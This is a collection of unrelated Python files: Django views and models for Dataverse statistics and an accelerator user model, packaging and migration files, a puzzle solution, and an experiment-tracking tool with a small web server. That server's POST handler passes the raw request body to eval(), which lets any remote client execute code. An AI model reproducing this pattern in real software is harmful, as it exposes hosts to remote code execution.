            'parent_id': self.get_parent_id(name, attrs),
            'value': str(value),
            'like_id': self.get_widget_id('like', name),
        }
        
    def render(self, name, value, attrs=None):
        context = self.get_context(name, value, attrs or {})
        return render_to_string(self.template, context)
#!/usr/bin/env python
import sys
import os
from treestore import Treestore


try: taxonomy = sys.argv[1]
except: taxonomy = None

t = Treestore()

treebase_uri = 'http://purl.org/phylo/treebase/phylows/tree/%s'

tree_files = [x for x in os.listdir('trees') if x.endswith('.nex')]
base_uri = 'http://www.phylocommons.org/trees/%s'
tree_list = set(t.list_trees())
for tree_uri in tree_list:
    if not 'TB2_' in tree_uri: continue
    tree_id = t.id_from_uri(tree_uri)
    tb_uri = treebase_uri % (tree_id.replace('_', ':'))
    print tree_id, tb_uri
    t.annotate(tree_uri, annotations='?tree bibo:cites <%s> .' % tb_uri)

from .stats_view_base import StatsViewSwagger, StatsViewSwaggerKeyRequired
from .stats_util_dataverses import StatsMakerDataverses


class DataverseCountByMonthView(StatsViewSwaggerKeyRequired):
    """API View - Dataverse counts by Month."""

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count/monthly'
    summary = ('Number of published Dataverses by'
            ' the month they were created*.  (*'
            ' Not month published)')
    description = ('Returns a list of counts and'
            ' cumulative counts of all Dataverses added in a month')
    description_200 = 'A list of Dataverse counts by month'

    param_names = StatsViewSwagger.PARAM_DV_API_KEY +\
                StatsViewSwagger.BASIC_DATE_PARAMS +\
                StatsViewSwagger.PUBLISH_PARAMS +\
                StatsViewSwagger.PRETTY_JSON_PARAM +\
                StatsViewSwagger.PARAM_AS_CSV

    tags = [StatsViewSwagger.TAG_DATAVERSES]

    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic"""
        stats_datasets = StatsMakerDataverses(**request.GET.dict())

        pub_state = self.get_pub_state(request)

        if pub_state == self.PUB_STATE_ALL:
            stats_result = stats_datasets.get_dataverse_counts_by_month()
        elif pub_state == self.PUB_STATE_UNPUBLISHED:
            stats_result = stats_datasets.get_dataverse_counts_by_month_unpublished()
        else:
            stats_result = stats_datasets.get_dataverse_counts_by_month_published()

        return stats_result

class DataverseTotalCounts(StatsViewSwaggerKeyRequired):
    """API View - Total count of all Dataverses"""

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count'
    summary = ('Simple count of published Dataverses')
    description = ('Returns number of published Dataverses')
    description_200 = 'Number of published Dataverses'
    param_names = StatsViewSwagger.PARAM_DV_API_KEY + StatsViewSwagger.PUBLISH_PARAMS + StatsViewSwagger.PRETTY_JSON_PARAM
    tags = [StatsViewSwagger.TAG_DATAVERSES]
    result_name = StatsViewSwagger.RESULT_NAME_TOTAL_COUNT


    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic"""
        stats_datasets = StatsMakerDataverses(**request.GET.dict())

        pub_state = self.get_pub_state(request)

        if pub_state == self.PUB_STATE_ALL:
            stats_result = stats_datasets.get_dataverse_count()
        elif pub_state == self.PUB_STATE_UNPUBLISHED:
            stats_result = stats_datasets.get_dataverse_count_unpublished()
        else:
            stats_result = stats_datasets.get_dataverse_count_published()

        return stats_result


class DataverseAffiliationCounts(StatsViewSwaggerKeyRequired):
    """API View - Number of Dataverses by Affiliation"""

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count/by-affiliation'
    summary = ('Number of Dataverses by Affiliation')
    description = ('Number of Dataverses by Affiliation.')
    description_200 = 'Number of published Dataverses by Affiliation.'
    param_names = StatsViewSwagger.PARAM_DV_API_KEY\
                + StatsViewSwagger.PUBLISH_PARAMS\
                + StatsViewSwagger.PRETTY_JSON_PARAM\
                + StatsViewSwagger.PARAM_AS_CSV
    result_name = StatsViewSwagger.RESULT_NAME_AFFILIATION_COUNTS
    tags = [StatsViewSwagger.TAG_DATAVERSES]

    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic"""
        stats_datasets = StatsMakerDataverses(**request.GET.dict())

        pub_state = self.get_pub_state(request)

        if pub_state == self.PUB_STATE_ALL:
            stats_result = stats_datasets.get_dataverse_affiliation_counts()
        elif pub_state == self.PUB_STATE_UNPUBLISHED:
            stats_result = stats_datasets.get_dataverse_affiliation_counts_unpublished()
        else:
            stats_result = stats_datasets.get_dataverse_affiliation_counts_published()

        return stats_result


class DataverseTypeCounts(StatsViewSwaggerKeyRequired):

    # Define the swagger attributes
    # Note: api_path must match the path in urls.py
    #
    api_path = '/dataverses/count/by-type'
    summary = ('Number of Dataverses by Type')
    description = ('Number of Dataverses by Type.')
    description_200 = 'Number of published Dataverses by Type.'
    param_names = StatsViewSwagger.PARAM_DV_API_KEY + StatsViewSwagger.PUBLISH_PARAMS +\
                    StatsViewSwagger.PRETTY_JSON_PARAM +\
                    StatsViewSwagger.DV_TYPE_UNCATEGORIZED_PARAM +\
                    StatsViewSwagger.PARAM_AS_CSV

    result_name = StatsViewSwagger.RESULT_NAME_DATAVERSE_TYPE_COUNTS
    tags = [StatsViewSwagger.TAG_DATAVERSES]

    def is_show_uncategorized(self, request):
        """Return the result of the "?show_uncategorized" query string param"""

        show_uncategorized = request.GET.get('show_uncategorized', False)
        if show_uncategorized is True or show_uncategorized == 'true':
            return True
        return False


    def get_stats_result(self, request):
        """Return the StatsResult object for this statistic"""
        stats_datasets = StatsMakerDataverses(**request.GET.dict())

        if self.is_show_uncategorized(request):
            exclude_uncategorized = False
        else:
            exclude_uncategorized = True

        pub_state = self.get_pub_state(request)

        if pub_state == self.PUB_STATE_ALL:
            stats_result = stats_datasets.get_dataverse_counts_by_type(exclude_uncategorized)
        elif pub_state == self.PUB_STATE_UNPUBLISHED:
            stats_result = stats_datasets.get_dataverse_counts_by_type_unpublished(exclude_uncategorized)
        else:
            stats_result = stats_datasets.get_dataverse_counts_by_type_published(exclude_uncategorized)

        return stats_result

import uuid

from django.db import models
from django.conf import settings
from django.contrib.auth.models import AbstractUser
from django.contrib.auth.models import BaseUserManager
from django.utils import timezone

from accelerator_abstract.models import BaseUserRole
from accelerator_abstract.models.base_base_profile import EXPERT_USER_TYPE


MAX_USERNAME_LENGTH = 30


class UserManager(BaseUserManager):
    use_in_migrations = True

    def _create_user(self, email, password,
                     is_staff, is_superuser, **extra_fields):
        """
        Creates and saves an User with the given email and password.
        """
        now = timezone.now()
        if not email:
            raise ValueError('An email address must be provided.')
        email = self.normalize_email(email)
        if "is_active" not in extra_fields:
            extra_fields["is_active"] = True
        if "username" not in extra_fields:
            # For now we need to have a unique id that is at
            # most 30 characters long.  Using uuid and truncating.
            # Ideally username goes away entirely at some point
            # since we're really using email.  If we have to keep
            # username for some reason then we could switch over
            # to a string version of the pk which is guaranteed
            # be unique.
            extra_fields["username"] = str(uuid.uuid4())[:MAX_USERNAME_LENGTH]
        user = self.model(email=email,
                          is_staff=is_staff,
                          is_superuser=is_superuser,
                          last_login=None,
                          date_joined=now,
                          **extra_fields)
        user.set_password(password)
        user.save(using=self._db)
        return user

    def create_user(self, email=None, password=None, **extra_fields):
        return self._create_user(email, password, False, False,
                                 **extra_fields)

    def create_superuser(self, email, password, **extra_fields):
        return self._create_user(email, password, True, True,
                                 **extra_fields)


class User(AbstractUser):
    # Override the parent email field to add uniqueness constraint
    email = models.EmailField(blank=True, unique=True)

    objects = UserManager()

    class Meta:
        db_table = 'auth_user'
        managed = settings.ACCELERATOR_MODELS_ARE_MANAGED

    def __init__(self, *args, **kwargs):
        super(User, self).__init__(*args, **kwargs)
        self.startup = None
        self.team_member = None
        self.profile = None
        self.user_finalist_roles = None

    class AuthenticationException(Exception):
        pass

    def __str__(self):
        return self.email

    def full_name(self):
        fn = self.first_name
        ln = self.last_name
        if fn and ln:
            name = u"%s %s" % (fn, ln)
        else:
            name = str(self.email)
        return name

    def user_phone(self):
        return self._get_profile().phone

    def image_url(self):
        return self._get_profile().image_url()

    def team_member_id(self):
        return self.team_member.id if self._get_member() else ''

    def user_title(self):
        return self._get_title_and_company()['title']

    def user_twitter_handle(self):
        return self._get_profile().twitter_handle

    def user_linked_in_url(self):
        return self._get_profile().linked_in_url

    def user_facebook_url(self):
        return self._get_profile().facebook_url

    def user_personal_website_url(self):
        return self._get_profile().personal_website_url

    def type(self):
        return self._get_profile().user_type

    def startup_name(self):
        return self._get_title_and_company()['company']

    def _get_title_and_company(self):
        if self._is_expert() and self._has_expert_details():
            profile = self._get_profile()
            title = profile.title
            company = profile.company
            return {
                "title": title,
                "company": company
            }
        self._get_member()
        title = self.team_member.title if self.team_member else ""
        company = self.startup.name if self._get_startup() else None
        return {
            "title": title,
            "company": company
        }

    def _has_expert_details(self):
        if self._is_expert():
            profile = self._get_profile()
            return True if profile.title or profile.company else False

    def startup_industry(self):
        return self.startup.primary_industry if self._get_startup() else None

    def top_level_startup_industry(self):
        industry = (
            self.startup.primary_industry if self._get_startup() else None)
        return industry.parent if industry and industry.parent else industry

    def startup_status_names(self):
        if self._get_startup():
            return [startup_status.program_startup_status.startup_status
                    for startup_status in self.startup.startupstatus_set.all()]

    def finalist_user_roles(self):
        if not self.user_finalist_roles:
            finalist_roles = BaseUserRole.FINALIST_USER_ROLES
            self.user_finalist_roles = self.programrolegrant_set.filter(
                program_role__user_role__name__in=finalist_roles
            ).values_list('program_role__name', flat=True).distinct()
        return list(self.user_finalist_roles)

    def program(self):
        return self.startup.current_program() if self._get_startup() else None

    def location(self):
        program = self.program()
        return program.program_family.name if program else None

    def year(self):
        program = self.program()
        return program.start_date.year if program else None

    def is_team_member(self):
        return True if self._get_member() else False

    def _get_startup(self):
        if not self.startup:
            self._get_member()
            if self.team_member:
                self.startup = self.team_member.startup
        return self.startup

    def _get_member(self):
        if not self.team_member:
            self.team_member = self.startupteammember_set.last()
        return self.team_member

    def _get_profile(self):
        if self.profile:
            return self.profile
        self.profile = self.get_profile()
        return self.profile

    def has_a_finalist_role(self):
        return len(self.finalist_user_roles()) > 0

    def _is_expert(self):
        profile = self._get_profile()
        return profile.user_type == EXPERT_USER_TYPE.lower()

from setuptools import setup, find_packages
from codecs import open
import os

def read(*paths):
    """Build a file path from *paths* and return the contents."""
    with open(os.path.join(*paths), 'r') as f:
        return f.read()

setup(
    name='transposer',
    version='0.0.3',
    description='Transposes columns and rows in delimited text files',
    long_description=(read('README.rst')),
    url='https://github.com/keithhamilton/transposer',
    author='Keith Hamilton',
    maintainer='Keith Hamilton',
    maintainer_email='the.keith.hamilton@gmail.com',
    license='BSD License',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Topic :: Office/Business'
       ],
    keywords='text, csv, tab-delimited, delimited, excel, sheet, spreadsheet',
    packages=find_packages(exclude=['contrib', 'docs', 'test*', 'bin', 'include', 'lib', '.idea']),
    install_requires=[],
    package_data={},
    data_files=[],
    entry_points={
        'console_scripts': [
           'transposer=transposer.script.console_script:main'
        ]
    }
)

# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-11-01 20:02
from __future__ import unicode_literals

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('phone_numbers', '0001_initial'),
        ('sims', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='phonenumber',
            name='related_sim',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='phone_numbers', to='sims.Sim'),
        ),
    ]

def calc():
	h, l = input().split(' ')

	mapa = []

	for i_row in range(int(h)):
		mapa.append(input().split(' '))

	maior_num = 0

	

	for row in mapa:
		for col in row:
			n = int(col)
			if (n > maior_num):
				maior_num = n
			
			

	qtd = [0 for i in range(maior_num + 1)]

	for row in mapa:
		for col in row:
			n = int(col)	

			qtd[n] = qtd[n] + 1
	
	menor = 1
	for i in range(1, len(qtd)):
		if (qtd[i] <= qtd[menor]):	
			menor = i	

	

	print(menor)
	

calc()

#!/usr/bin/env python

"""
Manage and display experimental results.
"""

__license__ = 'MIT License <http://www.opensource.org/licenses/mit-license.php>'
__author__ = 'Lucas Theis <lucas@theis.io>'
__docformat__ = 'epytext'
__version__ = '0.4.3'

import sys
import os
import numpy
import random
import scipy
import socket

sys.path.append('./code')

from argparse import ArgumentParser
from pickle import Unpickler, dump
from subprocess import Popen, PIPE
from os import path
from warnings import warn
from time import time, strftime, localtime
from numpy import ceil, argsort
from numpy.random import rand, randint
from distutils.version import StrictVersion
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from httplib import HTTPConnection
from getopt import getopt

class Experiment:
	"""
	@type time: float
	@ivar time: time at initialization of experiment

	@type duration: float
	@ivar duration: time in seconds between initialization and saving

	@type script: string
	@ivar script: stores the content of the main Python script

	@type platform: string
	@ivar platform: information about operating system

	@type processors: string
	@ivar processors: some information about the processors

	@type environ: string
	@ivar environ: environment variables at point of initialization

	@type hostname: string
	@ivar hostname: hostname of server running the experiment

	@type cwd: string
	@ivar cwd: working directory at execution time

	@type comment: string
	@ivar comment: a comment describing the experiment

	@type results: dictionary
	@ivar results: container to store experimental results

	@type commit: string
	@ivar commit: git commit hash

	@type modified: boolean
	@ivar modified: indicates uncommited changes

	@type filename: string
	@ivar filename: path to stored results

	@type seed: int
	@ivar seed: random seed used through the experiment

	@type versions: dictionary
	@ivar versions: versions of Python, numpy and scipy
	"""

	def __str__(self):
		"""
		Summarize information about the experiment.

		@rtype: string
		@return: summary of the experiment
		"""

		strl = []

		# date and duration of experiment
		strl.append(strftime('date \t\t %a, %d %b %Y %H:%M:%S', localtime(self.time)))
		strl.append('duration \t ' + str(int(self.duration)) + 's')
		strl.append('hostname \t ' + self.hostname)

		# commit hash
		if self.commit:
			if self.modified:
				strl.append('commit \t\t ' + self.commit + ' (modified)')
			else:
				strl.append('commit \t\t ' + self.commit)

		# results
		strl.append('results \t {' + ', '.join(map(str, self.results.keys())) + '}')

		# comment
		if self.comment:
			strl.append('\n' + self.comment)

		return '\n'.join(strl)



	def __del__(self):
		self.status(None)



	def __init__(self, filename='', comment='', seed=None, server=None, port=8000):
		"""
		If the filename is given and points to an existing experiment, load it.
		Otherwise store the current timestamp and try to get commit information
		from the repository in the current directory.

		@type  filename: string
		@param filename: path to where the experiment will be stored
		
		@type comment: string
		@param comment: a comment describing the experiment

		@type  seed: integer
		@param seed: random seed used in the experiment
		"""

		self.id = 0
		self.time = time()
		self.comment = comment
		self.filename = filename
		self.results = {}
		self.seed = seed
		self.script = ''
		self.cwd = ''
		self.platform = ''
		self.processors = ''
		self.environ = ''
		self.duration = 0
		self.versions = {}
		self.server = ''

		if self.seed is None:
			self.seed = int((time() + 1e6 * rand()) * 1e3) % 4294967295

		# set random seed
		random.seed(self.seed)
		numpy.random.seed(self.seed)

		if self.filename:
			# load given experiment
			self.load()

		else:
			# identifies the experiment
			self.id = randint(1E8)

			# check if a comment was passed via the command line
			parser = ArgumentParser(add_help=False)
			parser.add_argument('--comment')
			optlist, argv = parser.parse_known_args(sys.argv[1:])
			optlist = vars(optlist)

			# remove comment command line argument from argument list
			sys.argv[1:] = argv

			# comment given as command line argument
			self.comment = optlist.get('comment', '')

			# get OS information
			self.platform = sys.platform

			# arguments to the program
			self.argv = sys.argv
			self.script_path = sys.argv[0]

			try:
				with open(sys.argv[0]) as handle:
					# store python script
					self.script = handle.read()
			except:
				warn('Unable to read Python script.')

			# environment variables
			self.environ = os.environ
			self.cwd = os.getcwd()
			self.hostname = socket.gethostname()

			# store some information about the processor(s)
			if self.platform == 'linux2':
				cmd = 'egrep "processor|model name|cpu MHz|cache size" /proc/cpuinfo'
				with os.popen(cmd) as handle:
					self.processors = handle.read()
			elif self.platform == 'darwin':
				cmd = 'system_profiler SPHardwareDataType | egrep "Processor|Cores|L2|Bus"'
				with os.popen(cmd) as handle:
					self.processors = handle.read()

			# version information
			self.versions['python'] = sys.version
			self.versions['numpy'] = numpy.__version__
			self.versions['scipy'] = scipy.__version__

			# store information about git repository
			if path.isdir('.git'):
				# get commit hash
				pr1 = Popen(['git', 'log', '-1'], stdout=PIPE)
				pr2 = Popen(['head', '-1'], stdin=pr1.stdout, stdout=PIPE)
				pr3 = Popen(['cut', '-d', ' ', '-f', '2'], stdin=pr2.stdout, stdout=PIPE)
				self.commit = pr3.communicate()[0][:-1]

				# check if project contains uncommitted changes
				pr1 = Popen(['git', 'status', '--porcelain'], stdout=PIPE)
				pr2 = Popen(['egrep', '^.M'], stdin=pr1.stdout, stdout=PIPE)
				self.modified = pr2.communicate()[0]

				if self.modified:
					warn('Uncommitted changes.')
			else:
				# no git repository
				self.commit = None
				self.modified = False

			# server managing experiments 
			self.server = server
			self.port = port
			self.status('running')



	def status(self, status, **kwargs):
		if self.server:
			try:
				conn = HTTPConnection(self.server, self.port)
				conn.request('GET', '/version/')
				resp = conn.getresponse()

				if not resp.read().startswith('Experiment'):
					raise RuntimeError()

				HTTPConnection(self.server, self.port).request('POST', '', str(dict({
						'id': self.id,
						'version': __version__,
						'status': status,
						'hostname': self.hostname,
						'cwd': self.cwd,
						'script_path': self.script_path,
						'script': self.script,
						'comment': self.comment,
						'time': self.time,
					}, **kwargs)))
			except:
				warn('Unable to connect to \'{0}:{1}\'.'.format(self.server, self.port))



	def progress(self, progress):
		self.status('PROGRESS', progress=progress)



	def save(self, filename=None, overwrite=False):
		"""
		Store results. If a filename is given, the default is overwritten.

		@type  filename: string
		@param filename: path to where the experiment will be stored

		@type  overwrite: boolean
		@param overwrite: overwrite existing files
		"""

		self.duration = time() - self.time

		if filename is None:
			filename = self.filename
		else:
			# replace {0} and {1} by date and time
			tmp1 = strftime('%d%m%Y', localtime(time()))
			tmp2 = strftime('%H%M%S', localtime(time()))
			filename = filename.format(tmp1, tmp2)

			self.filename = filename

		# make sure directory exists
		try:
			os.makedirs(path.dirname(filename))
		except OSError:
			pass

		# make sure filename is unique
		counter = 0
		pieces = path.splitext(filename)

		if not overwrite:
			while path.exists(filename):
				counter += 1
				filename = pieces[0] + '.' + str(counter) + pieces[1]

			if counter:
				warn(''.join(pieces) + ' already exists. Saving to ' + filename + '.')

		# store experiment
		with open(filename, 'wb') as handle:
			dump({
				'version': __version__,
				'id': self.id,
				'time': self.time,
				'seed': self.seed,
				'duration': self.duration,
				'environ': self.environ,
				'hostname': self.hostname,
				'cwd': self.cwd,
				'argv': self.argv,
				'script': self.script,
				'script_path': self.script_path,
				'processors': self.processors,
				'platform': self.platform,
				'comment': self.comment,
				'commit': self.commit,
				'modified': self.modified,
				'versions': self.versions,
				'results': self.results}, handle, 1)

		self.status('SAVE', filename=filename, duration=self.duration)



	def load(self, filename=None):
		"""
		Loads experimental results from the specified file.

		@type  filename: string
		@param filename: path to where the experiment is stored
		"""

		if filename:
			self.filename = filename

		with open(self.filename, 'rb') as handle:
			res = load(handle)

			self.time = res['time']
			self.seed = res['seed']
			self.duration = res['duration']
			self.processors = res['processors']
			self.environ = res['environ']
			self.platform = res['platform']
			self.comment = res['comment']
			self.commit = res['commit']
			self.modified = res['modified']
			self.versions = res['versions']
			self.results = res['results']
			self.argv = res['argv'] \
				if StrictVersion(res['version']) >= '0.3.1' else None
			self.script = res['script'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.script_path = res['script_path'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.cwd = res['cwd'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.hostname = res['hostname'] \
				if StrictVersion(res['version']) >= '0.4.0' else None
			self.id = res['id'] \
				if StrictVersion(res['version']) >= '0.4.0' else None



	def __getitem__(self, key):
		return self.results[key]



	def __setitem__(self, key, value):
		self.results[key] = value



	def __delitem__(self, key):
		del self.results[key]



class ExperimentRequestHandler(BaseHTTPRequestHandler):
	"""
	Renders HTML showing running and finished experiments.
	"""

	xpck_path = ''
	running = {}
	finished = {}

	def do_GET(self):
		"""
		Renders HTML displaying running and saved experiments.
		"""

		# number of bars representing progress
		max_bars = 20

		if self.path == '/version/':
			self.send_response(200)
			self.send_header('Content-type', 'text/plain')
			self.end_headers()

			self.wfile.write('Experiment {0}'.format(__version__))

		elif self.path.startswith('/running/'):
			id = int([s for s in self.path.split('/') if s != ''][-1])

			# display running experiment
			if id in ExperimentRequestHandler.running:
				self.send_response(200)
				self.send_header('Content-type', 'text/html')
				self.end_headers()

				self.wfile.write(HTML_HEADER)
				self.wfile.write('<h2>Experiment</h2>')

				instance = ExperimentRequestHandler.running[id]

				num_bars = int(instance['progress']) * max_bars / 100

				self.wfile.write('<table>')
				self.wfile.write('<tr><th>Experiment:</th><td>{0}</td></tr>'.format(
					os.path.join(instance['cwd'], instance['script_path'])))
				self.wfile.write('<tr><th>Hostname:</th><td>{0}</td></tr>'.format(instance['hostname']))
				self.wfile.write('<tr><th>Status:</th><td class="running">{0}</td></tr>'.format(instance['status']))
				self.wfile.write('<tr><th>Progress:</th><td class="progress"><span class="bars">{0}</span>{1}</td></tr>'.format(
					'|' * num_bars, '|' * (max_bars - num_bars)))
				self.wfile.write('<tr><th>Start:</th><td>{0}</td></tr>'.format(
					strftime('%a, %d %b %Y %H:%M:%S', localtime(instance['time']))))
				self.wfile.write('<tr><th>Comment:</th><td>{0}</td></tr>'.format(
					instance['comment']  if instance['comment'] else '-'))
				self.wfile.write('</table>')

				self.wfile.write('<h2>Script</h2>')
				self.wfile.write('<pre>{0}</pre>'.format(instance['script']))
				self.wfile.write(HTML_FOOTER)

			elif id in ExperimentRequestHandler.finished:
				self.send_response(302)
				self.send_header('Location', '/finished/{0}/'.format(id))
				self.end_headers()

			else:
				self.send_response(200)
				self.send_header('Content-type', 'text/html')
				self.end_headers()

				self.wfile.write(HTML_HEADER)
				self.wfile.write('<h2>404</h2>')
				self.wfile.write('Requested experiment not found.')
				self.wfile.write(HTML_FOOTER)

		elif self.path.startswith('/finished/'):
			self.send_response(200)
			self.send_header('Content-type', 'text/html')
			self.end_headers()

			self.wfile.write(HTML_HEADER)

			id = int([s for s in self.path.split('/') if s != ''][-1])

			# display finished experiment
			if id in ExperimentRequestHandler.finished:
				instance = ExperimentRequestHandler.finished[id]

				if id in ExperimentRequestHandler.running:
					progress = ExperimentRequestHandler.running[id]['progress']
				else:
					progress = 100

				num_bars = int(progress) * max_bars / 100

				self.wfile.write('<h2>Experiment</h2>')
				self.wfile.write('<table>')
				self.wfile.write('<tr><th>Experiment:</th><td>{0}</td></tr>'.format(
					os.path.join(instance['cwd'], instance['script_path'])))
				self.wfile.write('<tr><th>Results:</th><td>{0}</td></tr>'.format(
					os.path.join(instance['cwd'], instance['filename'])))
				self.wfile.write('<tr><th>Status:</th><td class="finished">{0}</td></tr>'.format(instance['status']))
				self.wfile.write('<tr><th>Progress:</th><td class="progress"><span class="bars">{0}</span>{1}</td></tr>'.format(
					'|' * num_bars, '|' * (max_bars - num_bars)))
				self.wfile.write('<tr><th>Start:</th><td>{0}</td></tr>'.format(
					strftime('%a, %d %b %Y %H:%M:%S', localtime(instance['time']))))
				self.wfile.write('<tr><th>End:</th><td>{0}</td></tr>'.format(
					strftime('%a, %d %b %Y %H:%M:%S', localtime(instance['duration']))))
				self.wfile.write('<tr><th>Comment:</th><td>{0}</td></tr>'.format(
					instance['comment']  if instance['comment'] else '-'))
				self.wfile.write('</table>')

				self.wfile.write('<h2>Results</h2>')

				try:
					experiment = Experiment(os.path.join(instance['cwd'], instance['filename']))
				except:
					self.wfile.write('Could not open file.')
				else:
					self.wfile.write('<table>')
					for key, value in experiment.results.items():
						self.wfile.write('<tr><th>{0}</th><td>{1}</td></tr>'.format(key, value))
					self.wfile.write('</table>')

				self.wfile.write('<h2>Script</h2>')
				self.wfile.write('<pre>{0}</pre>'.format(instance['script']))


			else:
				self.wfile.write('<h2>404</h2>')
				self.wfile.write('Requested experiment not found.')

			self.wfile.write(HTML_FOOTER)

		else:
			files = []

			if 'xpck_path' in ExperimentRequestHandler.__dict__:
				if ExperimentRequestHandler.xpck_path != '':
					for path in ExperimentRequestHandler.xpck_path.split(':'):
						files += [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.xpck')]
				
			if 'XPCK_PATH' in os.environ:
				for path in os.environ['XPCK_PATH'].split(':'):
					files += [os.path.join(path, f) for f in os.listdir(path) if f.endswith('.xpck')]

			self.send_response(200)
			self.send_header('Content-type', 'text/html')
			self.end_headers()

			self.wfile.write(HTML_HEADER)
			self.wfile.write('<h2>Running</h2>')

			# display running experiments
			if ExperimentRequestHandler.running:
				self.wfile.write('<table>')
				self.wfile.write('<tr>')
				self.wfile.write('<th>Experiment</th>')
				self.wfile.write('<th>Hostname</th>')
				self.wfile.write('<th>Status</th>')
				self.wfile.write('<th>Progress</th>')
				self.wfile.write('<th>Start</th>')
				self.wfile.write('<th>Comment</th>')
				self.wfile.write('</tr>')

				# sort ids by start time of experiment 
				times = [instance['time'] for instance in ExperimentRequestHandler.running.values()]
				ids = ExperimentRequestHandler.running.keys()
				ids = [ids[i] for i in argsort(times)][::-1]

				for id in ids:
					instance = ExperimentRequestHandler.running[id]
					num_bars = int(instance['progress']) * max_bars / 100

					self.wfile.write('<tr>')
					self.wfile.write('<td class="filepath"><a href="/running/{1}/">{0}</a></td>'.format(
						instance['script_path'], instance['id']))
					self.wfile.write('<td>{0}</td>'.format(instance['hostname']))
					self.wfile.write('<td class="running">{0}</td>'.format(instance['status']))
					self.wfile.write('<td class="progress"><span class="bars">{0}</span>{1}</td>'.format(
						'|' * num_bars, '|' * (max_bars - num_bars)))
					self.wfile.write('<td>{0}</td>'.format(strftime('%a, %d %b %Y %H:%M:%S',
						localtime(instance['time']))))
					self.wfile.write('<td class="comment">{0}</td>'.format(
						instance['comment']  if instance['comment'] else '-'))
					self.wfile.write('</tr>')

				self.wfile.write('</table>')

			else:
				self.wfile.write('No running experiments.')

			self.wfile.write('<h2>Saved</h2>')

			# display saved experiments
			if ExperimentRequestHandler.finished:
				self.wfile.write('<table>')
				self.wfile.write('<tr>')
				self.wfile.write('<th>Results</th>')
				self.wfile.write('<th>Status</th>')
				self.wfile.write('<th>Progress</th>')
				self.wfile.write('<th>Start</th>')
				self.wfile.write('<th>End</th>')
				self.wfile.write('<th>Comment</th>')
				self.wfile.write('</tr>')

				# sort ids by start time of experiment 
				times = [instance['time'] + instance['duration']
					for instance in ExperimentRequestHandler.finished.values()]
				ids = ExperimentRequestHandler.finished.keys()
				ids = [ids[i] for i in argsort(times)][::-1]

				for id in ids:
					instance = ExperimentRequestHandler.finished[id]

					if id in ExperimentRequestHandler.running:
						progress = ExperimentRequestHandler.running[id]['progress']
					else:
						progress = 100

					num_bars = int(progress) * max_bars / 100

					self.wfile.write('<tr>')
					self.wfile.write('<td class="filepath"><a href="/finished/{1}/">{0}</a></td>'.format(
						instance['filename'], instance['id']))
					self.wfile.write('<td class="finished">saved</td>')
					self.wfile.write('<td class="progress"><span class="bars">{0}</span>{1}</td>'.format(
						'|' * num_bars, '|' * (max_bars - num_bars)))
					self.wfile.write('<td>{0}</td>'.format(strftime('%a, %d %b %Y %H:%M:%S',
						localtime(instance['time']))))
					self.wfile.write('<td>{0}</td>'.format(strftime('%a, %d %b %Y %H:%M:%S',
						localtime(instance['time'] + instance['duration']))))
					self.wfile.write('<td class="comment">{0}</td>'.format(
						instance['comment']  if instance['comment'] else '-'))
					self.wfile.write('</tr>')

				self.wfile.write('</table>')

			else:
				self.wfile.write('No saved experiments.')

			self.wfile.write(HTML_FOOTER)



	def do_POST(self):
		instances = ExperimentRequestHandler.running
		instance = eval(self.rfile.read(int(self.headers['Content-Length'])))
		
		if instance['status'] is 'PROGRESS':
			if instance['id'] not in instances:
				instances[instance['id']] = instance
				instances[instance['id']]['status'] = 'running'
			instances[instance['id']]['progress'] = instance['progress']

		elif instance['status'] is 'SAVE':
			ExperimentRequestHandler.finished[instance['id']] = instance
			ExperimentRequestHandler.finished[instance['id']]['status'] = 'saved'

		else:
			if instance['id'] in instances:
				progress = instances[instance['id']]['progress']
			else:
				progress = 0
			instances[instance['id']] = instance
			instances[instance['id']]['progress'] = progress

		if instance['status'] is None:
			try:
				del instances[instance['id']]
			except:
				pass



class XUnpickler(Unpickler):
	"""
	An extension of the Unpickler class which resolves some backwards
	compatibility issues of Numpy.
	"""

	def find_class(self, module, name):
		"""
		Helps Unpickler to find certain Numpy modules.
		"""

		try:
			numpy_version = StrictVersion(numpy.__version__)

			if numpy_version >= '1.5.0':
				if module == 'numpy.core.defmatrix':
					module = 'numpy.matrixlib.defmatrix'

		except ValueError:
			pass

		return Unpickler.find_class(self, module, name)



def load(file):
	return XUnpickler(file).load()
		


def main(argv):
	"""
	Load and display experiment information.
	"""

	if len(argv) < 2:
		print 'Usage:', argv[0], '[--server] [--port=<port>] [--path=<path>] [filename]'
		return 0

	optlist, argv = getopt(argv[1:], '', ['server', 'port=', 'path='])
	optlist = dict(optlist)

	if '--server' in optlist:
		try:
			ExperimentRequestHandler.xpck_path = optlist.get('--path', '')
			port = optlist.get('--port', 8000)

			# start server
			server = HTTPServer(('', port), ExperimentRequestHandler)
			server.serve_forever()

		except KeyboardInterrupt:
			server.socket.close()

		return 0

	# load experiment
	experiment = Experiment(sys.argv[1])

	if len(argv) > 1:
		# print arguments
		for arg in argv[1:]:
			try:
				print experiment[arg]
			except:
				print experiment[int(arg)]
		return 0

	# print summary of experiment
	print experiment

	return 0



HTML_HEADER = '''<html>
	<head>
		<title>Experiments</title>
		<style type="text/css">
			body {
				font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
				font-size: 11pt;
				color: black;
				background: white;
				padding: 0pt 20pt;
			}

			h2 {
				margin-top: 20pt;
				font-size: 16pt;
			}

			table {
				border-collapse: collapse;
			}

			tr:nth-child(even) {
